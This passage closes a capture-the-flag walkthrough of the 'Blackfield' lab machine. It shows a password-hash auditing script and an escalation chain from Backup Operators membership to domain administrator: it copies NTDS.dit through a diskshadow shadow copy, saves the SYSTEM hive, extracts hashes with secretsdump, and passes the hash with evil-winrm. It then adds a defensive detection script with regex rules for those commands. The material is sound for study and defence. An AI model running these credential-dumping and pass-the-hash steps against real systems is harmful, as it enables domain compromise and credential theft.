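            findings.append(f"{a['user']} (RID {a['rid']}): LM hash stored (weak, easily cracked)")
        by_nt[a["nt"]].append(a["user"])
    # Accounts sharing a non-empty NT hash share the same password.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append("shared password: " + ", ".join(users))
    return findings


# Sample input: the SAM dump lines shown above in the write-up.
SAMPLE = """HBoot Key: 1d645695662cc2a70d54ee626104485110101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for finding in audit(parse_pwdump(SAMPLE)):
        print(finding)
```

Run against the SAM output above it reports three accounts with an empty password (Guest, DefaultAccount and WDAGUtilityAccount, all disabled built-ins) and no LM or shared hashes. Note that on a domain controller the RID 500 entry in the SAM is the local DSRM administrator, not the domain Administrator; domain accounts live in NTDS.dit.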
- I tried to get a shell as Administrator with the dumped hash but was denied. On a domain controller the SAM holds only local accounts, so the domain accounts (including the domain Administrator) have to be dumped from the NTDS.dit file instead.
- Wrote the commands below to a file named diskshadow.txt. The script tells diskshadow to create a persistent shadow copy of the C: drive and expose it as drive Z:.
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
- Next, used robocopy in backup mode (/b) to copy NTDS.dit from the shadow copy on Z: into our Temp directory.
cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit
- Also saved a copy of the SYSTEM hive as system.bak in our Temp directory; it holds the boot key needed to decrypt the hashes in NTDS.dit.
cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak
- Downloaded both files to our local machine. This can take a long time, so go ahead and have some Kool-Aid.
- Once downloaded, used secretsdump.py to dump the contents of the NTDS.dit file and obtained the Administrator's password hash.
secretsdump.py -ntds ntds.dit -system system.bak LOCAL > hashes.txt
Administrator: 184fb5e5178480be64824d4cd53b99ee
- Finally, used Evil-WinRM with the Administrator hash to get a shell and captured the root flag.
evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
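A defender's counterpart to the procedure above, added here as an example and not part of the original write-up: a small Python correlation over constructed process-creation and logon telemetry. It flags a reg save of the SAM, SYSTEM or SECURITY hive, a scripted diskshadow run and a backup-mode robocopy of NTDS.dit, and raises the severity when the same logon session was granted SeBackupPrivilege at logon (Security event 4672). The event records, their simplified field names, the logon IDs and the user jdoe are all constructed; in production the process events would come from Security event 4688 with command-line auditing enabled, or Sysmon event 1.

```python
import re

# Command-line patterns for the three steps of the hive/NTDS backup technique shown above.
RULES = [
    ("reg-save-hive", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("diskshadow-script", re.compile(r"\bdiskshadow(?:\.exe)?\s+/s\b", re.I)),
    ("robocopy-backup-ntds", re.compile(r"\brobocopy(?:\.exe)?\b.*\s/b\b.*\bntds\.dit\b", re.I)),
]


def match_rules(command_line):
    """Return the names of all rules whose pattern appears in a process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def correlate(events):
    """Alert on matching process creations; escalate when the logon session holds SeBackupPrivilege."""
    # Logon sessions that were granted SeBackupPrivilege at logon (event 4672 lists them).
    backup_logons = {
        ev["logon_id"] for ev in events
        if ev["id"] == 4672 and "SeBackupPrivilege" in ev.get("privileges", "")
    }
    alerts = []
    for ev in events:
        if ev["id"] != 4688:
            continue
        hits = match_rules(ev["command_line"])
        if not hits:
            continue
        alerts.append({
            "user": ev["user"],
            "logon_id": ev["logon_id"],
            "rules": hits,
            "severity": "high" if ev["logon_id"] in backup_logons else "medium",
        })
    return alerts


# Constructed sample telemetry (not real logs): field names are simplified from the
# Windows event XML; logon IDs and the user jdoe are made up for the example.
SAMPLE_EVENTS = [
    {"id": 4672, "user": "svc_backup", "logon_id": "0x3a5f21",
     "privileges": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"id": 4688, "user": "svc_backup", "logon_id": "0x3a5f21",
     "command_line": r"reg save hklm\sam c:\Temp\sam"},
    {"id": 4688, "user": "svc_backup", "logon_id": "0x3a5f21",
     "command_line": r"diskshadow.exe /s c:\temp\diskshadow.txt"},
    {"id": 4688, "user": "svc_backup", "logon_id": "0x3a5f21",
     "command_line": r"robocopy /b .\ C:\temp NTDS.dit"},
    {"id": 4688, "user": "svc_backup", "logon_id": "0x3a5f21",
     "command_line": r"notepad.exe C:\notes.txt"},
    {"id": 4688, "user": "jdoe", "logon_id": "0x7b1c02",
     "command_line": r"reg.exe save hklm\system C:\temp\system.bak"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

On the sample the three svc_backup commands come out as high-severity alerts and jdoe's reg save as medium, while the notepad launch is ignored. The cheaper preventive control is to keep Backup Operators empty on domain controllers and alert on changes to its membership (events 4728/4732), since the group grants SeBackupPrivilege by design.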
Conclusion:
So that was "Blackfield" for you. This machine covers exploitation of Windows and Active Directory misconfigurations. Initially, anonymous / guest access to an SMB share was used to enumerate users. Once a user was found to have Kerberos pre-authentication disabled, we conducted an ASREPRoasting attack. This allowed us to retrieve a hash of the encrypted material contained in the AS-REP, which was then cracked via an offline brute-force attack. With this user's credentials, we accessed an SMB share containing forensic artefacts, including an lsass process dump. This contained a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group were then used to dump the Active Directory database and retrieve the hash of the primary domain administrator. On that note, I will take my leave and will meet you in the next one. Till then, "Happy hacking".